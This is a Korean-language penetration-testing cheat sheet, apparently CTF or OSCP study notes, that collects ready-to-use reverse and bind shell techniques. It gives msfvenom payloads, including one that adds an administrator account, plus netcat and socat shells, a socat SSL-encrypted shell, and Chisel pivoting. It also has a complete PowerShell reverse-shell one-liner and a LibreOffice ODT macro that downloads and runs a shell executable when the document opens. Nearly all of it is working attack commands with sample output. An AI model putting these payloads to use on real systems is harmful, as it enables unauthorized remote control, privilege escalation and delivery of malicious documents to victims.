쉘 생성기 : https://www.revshells.com/
Online - Reverse Shell Generator
Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.
www.revshells.com
대화형 셸 풀업 (Upgrading Non-Interactive Shell)
python -c 'import pty; pty.spawn("/bin/bash");'
[Ctrl + Z]
stty raw -echo; fg
Msfvenom(Metasploit Framework중 하나) 활용
Windows 10 x64 리버스 셸 생성:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f exe -o shell_53.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=443 -f exe -o shell_443.exe
특정 명령어 실행용 페이로드 (계정 추가 예시):
msfvenom -p windows/exec CMD="net localgroup administrators <USERNAME_TO_ADD> /add" -f exe -o file.exe
새 창 안 띄우고 프로세스 실행 (non-TTY 셸 튕기는 거 방지용):
start-process -nonewwindow -filepath ./shell.exe
Netcat 바인드 셸 (Bind Shell)
대상(Windows) 쪽에 바인드 셸 세팅:
C:\Users\offsec> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.11.0.22
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.11.0.1
C:\Users\offsec> nc -nlvp 4444 -e cmd.exe
listening on [any] 4444 ...
공격자(Kali)에서 바인드 셸 접속:
kali@kali:~$ nc -nv 10.11.0.22 4444
(UNKNOWN) [10.11.0.22] 4444 (?) open
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\offsec> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.11.0.22
Netcat 리버스 셸 (Reverse Shell)
Windows 쪽 리스너 열기:
C:\Users\offsec> nc -nlvp 4444
listening on [any] 4444 ...
Kali에서 셸 넘겨주기:
kali@kali:~$ ip address show eth0 | grep inet
inet 10.11.0.4/16 brd 10.11.255.255 scope global dynamic eth0
kali@kali:~$ nc -nv 10.11.0.22 4444 -e /bin/bash
(UNKNOWN) [10.11.0.22] 4444 (?) open
Windows 리스너 세션 접속 결과:
C:\Users\offsec>nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.0.22] from <UNKNOWN) [10.11.0.4] 43482
ip address show eth0 | grep inet
inet 10.11.0.4/16 brd 10.11.255.255 scope global dynamic eth0
Socat 리버스 셸
리스너 대기 (Windows):
C:\Users\offsec> socat -d -d TCP4-LISTEN:443 STDOUT
... socat[4388] N listening on AF=2 0.0.0.0:443
연결 요청 (Kali):
kali@kali:~$ socat TCP4:10.11.0.22:443 EXEC:/bin/bash
Socat 암호화 바인드 셸 (Encrypted Bind Shell)
SSL 인증서 생성:
kali@kali:~$ openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
.pem 파일 생성:
kali@kali:~$ cat bind_shell.key bind_shell.crt > bind_shell.pem
암호화 바인드 셸 대기 (Kali):
kali@kali:~$ sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
접속 (Windows):
C:\Users\offsec> socat - OPENSSL:10.11.0.4:443,verify=0
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
Chisel 피보팅
링크: https://github.com/jpillora/chisel/releases
피보팅(Pivoting): 보안이 적용된 내부망에 침투하기 위해, 이미 장악한 외부 연결 가능 시스템(중계 서버)을 거쳐 다른 내부망 대상에 접근하는 기법
리버스 피봇 설정:
./chisel server -p 9002 -reverse -v # Kali에서 실행
./chisel client <RHOST>:9002 R:9003:127.0.0.1:8888 # 타겟 머신에서 실행
SOCKS5 / Proxychains 설정:
./chisel server -p 9002 -reverse -v # Kali에서 실행
./chisel client <RHOST>:9002 R:socks # 타겟 머신에서 실행
PowerShell 리버스 셸
리스너 대기 (Kali):
kali@kali:~$ sudo nc -lnvp 443
listening on [any] 443 ...
파워쉘 One liner 실행 (Windows):
C:\Users\offsec> powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
연결 수신 화면:
kali@kali:~$ sudo nc -lnvp 443
listening on [any] 443 ...
connect to [10.11.0.4] from (UNKNOWN) [10.11.0.22] 63515
PS C:\Users\offsec>
PHP 리버스 셸
Pentestmonkey PHP 리버스 셸 Source: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
LibreOffice ODT 매크로 활용
ODT(Open Document Text) 파일 업로드랑 실행 가능할 때 내부에 매크로 심어서 셸 따는 방식.
- reverse.ps1 파일 생성해서 파워쉘 리버스 셸 페이로드 저장:
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- LibreOffice 매크로 작성:
Sub Main
Shell("cmd /c certutil -urlcache -split -f http://<kali_ip>:80/shell_80.exe C:\\Windows\\Tasks\\shell_80.exe")
Shell("cmd /c C:\Windows\Tasks\shell_80.exe")
End Sub
- 매크로를 "Open Document" 이벤트에 바인딩 (Tools -> Customize -> Events).
- 저장하고 Netcat 리스너랑 파이썬 웹서버 띄운 다음 ODT 파일 업로드해서 실행 유도.